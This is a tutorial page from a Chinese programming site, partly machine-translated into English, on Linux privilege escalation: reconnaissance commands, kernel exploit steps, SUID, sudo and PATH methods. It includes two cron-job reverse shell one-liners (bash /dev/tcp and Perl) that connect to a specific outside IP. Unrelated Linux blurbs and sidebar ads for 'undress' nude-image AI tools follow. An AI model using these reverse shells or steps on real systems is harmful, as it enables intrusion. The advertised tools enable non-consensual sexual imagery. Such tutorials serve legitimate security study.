


提权指的是低权限用户利用各种合法的或非法的手段获取到了高于本用户的系统权限;Linux提权一般是指获取root用户权限的操作过程。Linux提权的本质一方面是信息收集,另一方面是对内核漏洞的掌握情况;提权是否成功的关键是信息收集是否完整。
本教程操作环境:linux7.3系统、Dell G3电脑。
linux提权概念介绍
提权是什么
提权指的是低权限用户利用各种合法的或非法的手段获取到了高于本用户的系统权限。
详细来说,就是指利用操作系统或应用软件中的程序漏洞、设计缺陷或配置疏忽来获取对应用程序或用户来说受保护资源的高级访问权限。其结果是,应用程序可以获取比应用程序开发者或系统管理员预期的更高的特权,从而可以执行授权的动作。
Linux提权一般是指获取root用户权限的操作过程。
Linux提权目的
提权操作有风险为什么还要进行提权?什么情况下需要进行提权?获取高权限之后可以做什么?
通过命令执行漏洞获取的一个反弹shell或是通过Web漏洞获取了一个Webshell后,一般情况下权限都较低。在执行一些重要敏感的操作或是对重要的文件进行修改时无法正常进行,便需要进行提权。Linux中安装的数据库、中间件等一般都不是以root用户启动的,通过数据库或是中间件获取到的权限是是低权限的。
获取一个root权限是每一个黑客的梦想。
- 读取写入服务器中的重要文件:
- 修改root密码
- 替换系统命令
- 在系统中放置更为隐蔽的后门:
- ping后门
- Rootkit
- 保证服务器重启之后权限仍在:
- 内存后门
Linux提权本质
Linux提权的本质一方面是信息收集,另一方面是对内核漏洞的掌握情况。
Linux信息收集
任何提权的第一步操作一定是对操作系统进行信息收集。提权是否成功的关键是信息收集是否完整。
-
内核设备信息:
- uname -a 打印所有可用的系统信息
- uname -r 内核版本
- uname -n 系统主机名。
- uname -m 查看系统内核架构(64位/32位)
- hostname 系统主机名
- cat /proc/version 内核信息
- cat /etc/*-release 分发信息
- cat /etc/issue 分发信息
- cat /proc/cpuinfo CPU信息
-
用户和群组信息:
- cat /etc/passwd 列出系统上的所有用户
- cat /etc/group 列出系统上的所有组
- grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' 列出所有的超级用户账户
- whoami 查看当前用户
- w 谁目前已登录,他们正在做什么
- last 最后登录用户的列表
- lastlog 所有用户上次登录的信息
- lastlog -u %username% 有关指定用户上次登录的信息
- lastlog |grep -v "Never" 以前登录用户的信息
-
用户和权限信息:
- whoami 当前用户名
- id 当前用户信息
- cat /etc/sudoers 谁被允许以root身份执行
- sudo -l 当前用户可以以root身份执行操作
-
环境系统变量信息:
- env 显示环境变量
- set 现实环境变量
- echo %PATH 路径信息
- history 显示当前用户的历史命令记录
- pwd 输出工作目录
- cat /etc/profile 显示默认系统变量
- cat /etc/shells 显示可用的shell
内核漏洞提权
内核漏洞提权指的是普通用户访问操作系统内核,利用内核漏洞将权限提高为root权限,一般首先需要知晓操作系统的内核,内核的版本等信息,再寻找内核漏洞的EXP进行提权
linux常用查看系统信息命令 uname -a 查看系统全部信息 uname -r 查看内核版本 cat /proc/version 查看内核信息 cat /etc/*-realease 查看CentOS版本 cat /etc/issue 查看Ubuntu版本 cat /etc/redhat-release 查看RedHat版本 env 查看环境变量 echo $PATH 查看当前环境变量 awk -F: '($3==0){print $1}' /etc/passwd 查找UID为0的用户 find / -user root -perm -4000 -exec ls -ldb {} \; 查找设置了SUID的文件
1)查看系统的内核版本
2) Use kali’s searchsploit to find the corresponding kernel vulnerability or search for the corresponding kernel vulnerability online
3) Use gcc to Compile the C language program into an executable file, upload it to the target machine, and execute it to escalate privileges to root privileges
Other privilege escalation methods in Linux
1. Scheduled task privilege escalation
Utilization principle:
- When /bin/sh points to /bin/dash (ubuntu defaults to this, and the current target machine also does this), use bash to rebound the shell. Play like this: * * * * * root bash -c "bash -i >&/dev/tcp/106.13.124.93/2333 0>&1"
I don’t know why it is very slow when playing the shell like this, please be patient and wait. - */1 * * * * root perl -e 'use Socket;\(i="106.13.124.93";\)p=2333;socket(S,PF_INET,SOCK_STREAM ,getprotobyname("tcp"));if(connect(S,sockaddr_in(\(p,inet_aton(\)i)))){open(STDIN,">&S");open( STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
2. Utilization SUID privilege escalation
SUID concept: SUID (set user ID) is a permission given to a file. It will appear in the execution bit of the file owner's permissions. It has this A file with this kind of permission will allow the caller to temporarily obtain the permissions of the file owner when it is executed. SUID allows the caller to run the file as the file owner, so our idea of using SUID to escalate privileges is to run the file with the SUID owned by the root user. Then when we run the file, we have to obtain the identity of the root user. So, why do we need to set this permission on Linux binaries? In fact, there are many reasons. For example, the program ping requires root privileges to open a network socket, but the user who executes the program is usually an ordinary user to verify connectivity with other hosts.
SUID privilege escalation: What is suid privilege escalation? A file has an s flag, and if it enters root, then we can have root permissions by running this program, and the program must be able to execute commands, then we can upgrade from an ordinary user to root permissions.
-
Find local files that meet the conditions.
- find / -user root -perm -4000 -print 2>/dev/null
- find / -perm -u=s -type f 2>/dev/null
- find / -user root -perm -4000 -exec ls -ldb {} ;
-
Common programs that can escalate privileges
- nmap vim find Bash More Less Nano cp netcat
3. Use SUDO to escalate privileges
Can be used in Linux systems sudo executes a command that only root can execute. The configuration file is saved in /etc/sudoers. sudo -l can list the commands that the current user supports sudo.
Try to analyze the vulnerability from the code level.
4. Environment variable privilege escalation
-
View the current environment variables:
- echo $PATH
5. Services running with root privileges
- Services running with root privileges, including third-party software, can be provided right.
Related recommendations: "Linux Video Tutorial"
The above is the detailed content of What does linux privilege escalation mean?. For more information, please follow other related articles on the PHP Chinese website!

The five core components of the Linux operating system are: 1. Kernel, 2. System libraries, 3. System tools, 4. System services, 5. File system. These components work together to ensure the stable and efficient operation of the system, and together form a powerful and flexible operating system.

The five core elements of Linux are: 1. Kernel, 2. Command line interface, 3. File system, 4. Package management, 5. Community and open source. Together, these elements define the nature and functionality of Linux.

Linux user management and security can be achieved through the following steps: 1. Create users and groups, using commands such as sudouseradd-m-gdevelopers-s/bin/bashjohn. 2. Bulkly create users and set password policies, using the for loop and chpasswd commands. 3. Check and fix common errors, home directory and shell settings. 4. Implement best practices such as strong cryptographic policies, regular audits and the principle of minimum authority. 5. Optimize performance, use sudo and adjust PAM module configuration. Through these methods, users can be effectively managed and system security can be improved.

The core operations of Linux file system and process management include file system management and process control. 1) File system operations include creating, deleting, copying and moving files or directories, using commands such as mkdir, rmdir, cp and mv. 2) Process management involves starting, monitoring and killing processes, using commands such as ./my_script.sh&, top and kill.

Shell scripts are powerful tools for automated execution of commands in Linux systems. 1) The shell script executes commands line by line through the interpreter to process variable substitution and conditional judgment. 2) The basic usage includes backup operations, such as using the tar command to back up the directory. 3) Advanced usage involves the use of functions and case statements to manage services. 4) Debugging skills include using set-x to enable debugging mode and set-e to exit when the command fails. 5) Performance optimization is recommended to avoid subshells, use arrays and optimization loops.

Linux is a Unix-based multi-user, multi-tasking operating system that emphasizes simplicity, modularity and openness. Its core functions include: file system: organized in a tree structure, supports multiple file systems such as ext4, XFS, Btrfs, and use df-T to view file system types. Process management: View the process through the ps command, manage the process using PID, involving priority settings and signal processing. Network configuration: Flexible setting of IP addresses and managing network services, and use sudoipaddradd to configure IP. These features are applied in real-life operations through basic commands and advanced script automation, improving efficiency and reducing errors.

The methods to enter Linux maintenance mode include: 1. Edit the GRUB configuration file, add "single" or "1" parameters and update the GRUB configuration; 2. Edit the startup parameters in the GRUB menu, add "single" or "1". Exit maintenance mode only requires restarting the system. With these steps, you can quickly enter maintenance mode when needed and exit safely, ensuring system stability and security.

The core components of Linux include kernel, shell, file system, process management and memory management. 1) Kernel management system resources, 2) shell provides user interaction interface, 3) file system supports multiple formats, 4) Process management is implemented through system calls such as fork, and 5) memory management uses virtual memory technology.


Hot AI Tools

Undresser.AI Undress
AI-powered app for creating realistic nude photos

AI Clothes Remover
Online AI tool for removing clothes from photos.

Undress AI Tool
Undress images for free

Clothoff.io
AI clothes remover

Video Face Swap
Swap faces in any video effortlessly with our completely free AI face swap tool!

Hot Article

Hot Tools

VSCode Windows 64-bit Download
A free and powerful IDE editor launched by Microsoft

Notepad++7.3.1
Easy-to-use and free code editor

WebStorm Mac version
Useful JavaScript development tools

SublimeText3 Chinese version
Chinese version, very easy to use

SAP NetWeaver Server Adapter for Eclipse
Integrate Eclipse with SAP NetWeaver application server.
